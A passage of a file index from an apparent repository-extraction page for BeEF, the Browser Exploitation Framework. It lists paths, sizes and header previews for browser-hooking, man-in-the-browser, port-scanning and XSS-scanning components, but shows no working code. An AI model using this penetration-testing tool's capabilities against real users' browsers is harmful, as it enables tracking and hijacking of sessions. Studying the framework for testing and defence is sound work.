"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api/modules.rb",
"chars": 438,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/api.rb",
"chars": 6944,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/bootstrap.rb",
"chars": 1806,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/core.rb",
"chars": 1260,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/extension.rb",
"chars": 1829,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/extensions.rb",
"chars": 1479,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters/base.rb",
"chars": 8121,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters/browser.rb",
"chars": 6213,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters/command.rb",
"chars": 2305,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters/http.rb",
"chars": 1958,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters/page.rb",
"chars": 967,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/filters.rb",
"chars": 395,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/hbmanager.rb",
"chars": 772,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/loader.rb",
"chars": 1248,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/logger.rb",
"chars": 430,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/ar-migrations/001_create_command_modules.rb",
"chars": 168,
"preview": "class CreateCommandModules < ActiveRecord::Migration[6.0]\n def change\n create_table :command_modules do |t|\n t."
},
{
"path": "core/main/ar-migrations/002_create_hooked_browsers.rb",
"chars": 334,
"preview": "class CreateHookedBrowsers < ActiveRecord::Migration[6.0]\n def change\n create_table :hooked_browsers do |t|\n t."
},
{
"path": "core/main/ar-migrations/003_create_logs.rb",
"chars": 209,
"preview": "class CreateLogs < ActiveRecord::Migration[6.0]\n def change\n create_table :logs do |t|\n t.text :logtype\n t"
},
{
"path": "core/main/ar-migrations/004_create_commands.rb",
"chars": 308,
"preview": "class CreateCommands < ActiveRecord::Migration[6.0]\n def change\n create_table :commands do |t|\n t.references :c"
},
{
"path": "core/main/ar-migrations/005_create_results.rb",
"chars": 244,
"preview": "class CreateResults < ActiveRecord::Migration[6.0]\n def change\n create_table :results do |t|\n t.references :com"
},
{
"path": "core/main/ar-migrations/006_create_option_caches.rb",
"chars": 165,
"preview": "class CreateOptionCaches < ActiveRecord::Migration[6.0]\n def change\n create_table :option_caches do |t|\n t.text"
},
{
"path": "core/main/ar-migrations/007_create_browser_details.rb",
"chars": 207,
"preview": "class CreateBrowserDetails < ActiveRecord::Migration[6.0]\n def change\n create_table :browser_details do |t|\n t."
},
{
"path": "core/main/ar-migrations/008_create_executions.rb",
"chars": 327,
"preview": "class CreateExecutions < ActiveRecord::Migration[6.0]\n def change\n create_table :executions do |t|\n t.text :ses"
},
{
"path": "core/main/ar-migrations/009_create_rules.rb",
"chars": 352,
"preview": "class CreateRules < ActiveRecord::Migration[6.0]\n def change\n create_table :rules do |t|\n t.text :name\n t."
},
{
"path": "core/main/ar-migrations/010_create_interceptor.rb",
"chars": 165,
"preview": "class CreateInterceptor < ActiveRecord::Migration[6.0]\n def change\n create_table :interceptors do |t|\n t.text :"
},
{
"path": "core/main/ar-migrations/011_create_web_cloner.rb",
"chars": 159,
"preview": "class CreateWebCloner < ActiveRecord::Migration[6.0]\n def change\n create_table :web_cloners do |t|\n t.text :uri"
},
{
"path": "core/main/ar-migrations/013_create_network_host.rb",
"chars": 278,
"preview": "class CreateNetworkHost < ActiveRecord::Migration[6.0]\n def change\n create_table :network_hosts do |t|\n t.refer"
},
{
"path": "core/main/ar-migrations/014_create_network_service.rb",
"chars": 242,
"preview": "class CreateNetworkService < ActiveRecord::Migration[6.0]\n def change\n create_table :network_services do |t|\n t"
},
{
"path": "core/main/ar-migrations/015_create_http.rb",
"chars": 1542,
"preview": "class CreateHttp < ActiveRecord::Migration[6.0]\n def change\n create_table :https do |t|\n t.text :hooked_browser"
},
{
"path": "core/main/ar-migrations/016_create_rtc_status.rb",
"chars": 219,
"preview": "class CreateRtcStatus < ActiveRecord::Migration[6.0]\n def change\n create_table :rtc_statuss do |t|\n t.reference"
},
{
"path": "core/main/ar-migrations/017_create_rtc_manage.rb",
"chars": 221,
"preview": "class CreateRtcManage < ActiveRecord::Migration[6.0]\n def change\n create_table :rtc_manages do |t|\n t.reference"
},
{
"path": "core/main/ar-migrations/018_create_rtc_signal.rb",
"chars": 262,
"preview": "class CreateRtcSignal < ActiveRecord::Migration[6.0]\n def change\n create_table :rtc_signals do |t|\n t.reference"
},
{
"path": "core/main/ar-migrations/019_create_rtc_module_status.rb",
"chars": 267,
"preview": "class CreateRtcModuleStatus < ActiveRecord::Migration[6.0]\n def change\n create_table :rtc_module_statuss do |t|\n "
},
{
"path": "core/main/ar-migrations/020_create_xssrays_detail.rb",
"chars": 242,
"preview": "class CreateXssraysDetail < ActiveRecord::Migration[6.0]\n def change\n create_table :xssraysdetails do |t|\n t.re"
},
{
"path": "core/main/ar-migrations/021_create_dns_rule.rb",
"chars": 208,
"preview": "class CreateDnsRule < ActiveRecord::Migration[6.0]\n def change\n create_table :dns_rules do |t|\n t.text :pattern"
},
{
"path": "core/main/ar-migrations/024_create_autoloader.rb",
"chars": 174,
"preview": "class CreateAutoloader < ActiveRecord::Migration[6.0]\n def change\n create_table :autoloaders do |t|\n t.referenc"
},
{
"path": "core/main/ar-migrations/025_create_xssrays_scan.rb",
"chars": 354,
"preview": "class CreateXssraysScan < ActiveRecord::Migration[6.0]\n def change\n create_table :xssraysscans do |t|\n t.refere"
},
{
"path": "core/main/autorun_engine/engine.rb",
"chars": 25444,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/autorun_engine/parser.rb",
"chars": 3886,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/autorun_engine/rule_loader.rb",
"chars": 7973,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/client/are.js",
"chars": 908,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/beef.js",
"chars": 2995,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/browser/cookie.js",
"chars": 3293,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/browser/popup.js",
"chars": 855,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/browser.js",
"chars": 189816,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/dom.js",
"chars": 19330,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/encode/base64.js",
"chars": 4659,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/encode/json.js",
"chars": 4167,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/geolocation.js",
"chars": 4022,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/hardware.js",
"chars": 9575,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/init.js",
"chars": 2667,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/lib/evercookie.js",
"chars": 25951,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/lib/jquery-migrate-1.4.1.js",
"chars": 23516,
"preview": "/*!\n * jQuery Migrate - v1.4.1 - 2016-05-19\n * Copyright jQuery Foundation and other contributors\n */\n(function( jQuery,"
},
{
"path": "core/main/client/lib/jquery.blockUI.js",
"chars": 19966,
"preview": "/*!\n * jQuery blockUI plugin\n * Version 2.70.0-2014.11.23\n * Requires jQuery v1.7 or later\n *\n * Examples at: http://mal"
},
{
"path": "core/main/client/lib/json2.js",
"chars": 12399,
"preview": "// json2.js\n// 2016-10-28\n// Public Domain.\n// NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.\n// See http:"
},
{
"path": "core/main/client/lib/mdetect.js",
"chars": 35694,
"preview": "/* *******************************************\n// Copyright 2010-2015, Anthony Hand\n//\n// BETA NOTICE\n// Previous versio"
},
{
"path": "core/main/client/lib/platform.js",
"chars": 42688,
"preview": "/*!\n * Platform.js\n * Copyright 2014-2020 Benjamin Tan\n * Copyright 2011-2013 John-David Dalton\n * Available under MIT l"
},
{
"path": "core/main/client/lib/webrtcadapter.js",
"chars": 13578,
"preview": "/*\n * Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.\n *\n * Use of this source code is governed by"
},
{
"path": "core/main/client/logger.js",
"chars": 9209,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/mitb.js",
"chars": 9403,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/connection.js",
"chars": 1682,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/cors.js",
"chars": 2570,
"preview": "/**\n * @namespace beef.net.cors\n */\n\nbeef.net.cors = {\n\n handler: \"cors\",\n\n /**\n * Response Object - used in the"
},
{
"path": "core/main/client/net/dns.js",
"chars": 3457,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/local.js",
"chars": 2217,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/portscanner.js",
"chars": 1357,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/requester.js",
"chars": 1873,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/net/xssrays.js",
"chars": 26704,
"preview": "/*\n * XSS Rays\n * Legal bit:\n * Do not remove this notice.\n * Copyright (c) 2009 by Gareth Heyes\n * Programmed for Micro"
},
{
"path": "core/main/client/net.js",
"chars": 22859,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/os.js",
"chars": 7920,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/session.js",
"chars": 2200,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/timeout.js",
"chars": 708,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/updater.js",
"chars": 2705,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/webrtc.js",
"chars": 27242,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/client/websocket.js",
"chars": 3512,
"preview": "//\n// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n// Browser Exploitation Framework (BeEF) - https://beefpr"
},
{
"path": "core/main/command.rb",
"chars": 8699,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/configuration.rb",
"chars": 9080,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/console/banners.rb",
"chars": 6284,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/console/beef.ascii",
"chars": 2911,
"preview": " \n .O, "
},
{
"path": "core/main/console/commandline.rb",
"chars": 2507,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/constants/browsers.rb",
"chars": 2272,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/constants/commandmodule.rb",
"chars": 530,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/constants/hardware.rb",
"chars": 2514,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/constants/os.rb",
"chars": 2467,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/crypto.rb",
"chars": 2931,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/geoip.rb",
"chars": 1564,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/browserdetails.rb",
"chars": 26251,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/commands.rb",
"chars": 3684,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/hookedbrowsers.rb",
"chars": 7449,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/modules/beefjs.rb",
"chars": 8972,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/modules/command.rb",
"chars": 4014,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/modules/legacybeefjs.rb",
"chars": 8999,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/handlers/modules/multistagebeefjs.rb",
"chars": 9002,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/logger.rb",
"chars": 1917,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/migration.rb",
"chars": 1556,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/model.rb",
"chars": 347,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/browserdetails.rb",
"chars": 1934,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/command.rb",
"chars": 2992,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/commandmodule.rb",
"chars": 326,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/execution.rb",
"chars": 372,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/hookedbrowser.rb",
"chars": 511,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/legacybrowseruseragents.rb",
"chars": 576,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/log.rb",
"chars": 321,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/optioncache.rb",
"chars": 297,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/result.rb",
"chars": 349,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/models/rule.rb",
"chars": 385,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/api.rb",
"chars": 727,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/assethandler.rb",
"chars": 10663,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/handlers/dynamicreconstruction.rb",
"chars": 4908,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/handlers/raw.rb",
"chars": 736,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/handlers/redirector.rb",
"chars": 926,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/network_stack/websocket/websocket.rb",
"chars": 12031,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/api.rb",
"chars": 4178,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/admin.rb",
"chars": 2708,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/autorun_engine.rb",
"chars": 5186,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/browserdetails.rb",
"chars": 1370,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/categories.rb",
"chars": 1069,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/hookedbrowsers.rb",
"chars": 7012,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/logs.rb",
"chars": 2749,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/modules.rb",
"chars": 11741,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/rest/handlers/server.rb",
"chars": 2183,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/router/api.rb",
"chars": 524,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/router/router.rb",
"chars": 17602,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/main/server.rb",
"chars": 5710,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/module.rb",
"chars": 17640,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/modules.rb",
"chars": 2268,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby/hash.rb",
"chars": 754,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby/module.rb",
"chars": 1160,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby/print.rb",
"chars": 2761,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby/security.rb",
"chars": 757,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby/string.rb",
"chars": 319,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/ruby.rb",
"chars": 370,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "core/settings.rb",
"chars": 942,
"preview": "#\n# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\n# Browser Exploitation Framework (BeEF) - https://beefproje"
},
{
"path": "doc/COPYING",
"chars": 18746,
"preview": "COPYING -- Describes the terms under which the Browser Exploitation\nFramework (BeEF) is distributed. A copy of the GNU G"
},
{
"path": "doc/boilerplate",
"chars": 170,
"preview": "Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net\nBrowser Exploitation Framework (BeEF) - https://beefproject.com"
},
{
"path": "docs/BeefJS.html",
"chars": 7739,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <title>JSDoc: Namespace: BeefJS</title>\n\n <scr"
},
{
"path": "docs/are.js.html",
"chars": 3405,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <title>JSDoc: Source: are.js</title>\n\n <script"
},
{
"path": "docs/beef.are.html",
"chars": 5757,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <title>JSDoc: Namespace: are</title>\n\n <script"
},
{
"path": "docs/beef.browser.cookie.html",
"chars": 7006,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <title>JSDoc: Namespace: cookie</title>\n\n <scr"
}
]
// ... and 1392 more files (download for full content)
About this extraction
This page contains the full source code of the beefproject/beef GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 1592 files (6.0 MB), approximately 1.7M tokens, and a symbol index with 2799 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.